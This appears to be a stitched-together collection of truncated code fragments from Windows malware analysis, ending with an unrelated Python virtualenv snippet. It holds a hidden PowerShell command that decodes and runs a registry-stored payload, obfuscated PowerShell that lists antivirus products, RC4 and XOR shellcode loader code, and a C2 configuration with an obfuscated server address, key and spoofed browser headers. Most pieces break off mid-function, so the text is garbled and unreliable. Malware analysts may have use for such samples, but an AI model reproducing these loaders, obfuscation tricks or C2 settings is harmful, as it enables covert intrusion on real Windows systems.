; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"
; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/
# From "LNK file" malware
function Get-Soft {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
)
foreach ($comp in $ComputerName) {
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
foreach ($key in $keys) {
function rsrzis {
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
$ErrorActionPreference = "SilentlyContinue";
function wlc2 {
param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
powershell payload decoded
# Formatting tweaked for readability as an embedded gist; will not execute
# Comments added as well
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = (
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
Function jpnm {
sal bifsynume Add-Type ;
if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
bifsynume @"
using System;
using System.Runtime.InteropServices;
public class tqjn
{
# remove files that match a specified hash
$PATH = "c:\testing"
$HASH = "39DD73E4DAE46B506E7F9B41066F7F21E5D61DADD4D2B5806D31E364886C2D08"
$files = Get-ChildItem -Path $PATH -File
ForEach ($f in $files)
{
$fullpath = "$PATH\$f"
$hashInfo = Get-FileHash $fullpath -Algorithm SHA256
$IP = 'X.X.X.X'
$Port = 53
$VirtualAlloc = $null
$CreateThread = $null
$WaitForSingleObject = $null
$XORKEY = 0x50
function XorByteArr
{
Param
(
# Semi-deobfuscated PowerShell from malware analysis
function sdnfjshdklfhlj {
$ag = @{
srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH';
usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
encutf = [System.Text.Encoding]::UTF8;
#ifndef UNICODE
#define UNICODE
#endif
#include<windows.h>
int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow)
{
wchar_t path[256];
DWORD size = 256;
Set up a Python virtualenv on Ubuntu
# Install the Debian/Ubuntu package that provides Python's venv module.
apt-get install python3-venv
# Create the virtual environment; {env_dir} is a placeholder for the target directory.
python3 -m venv {env_dir}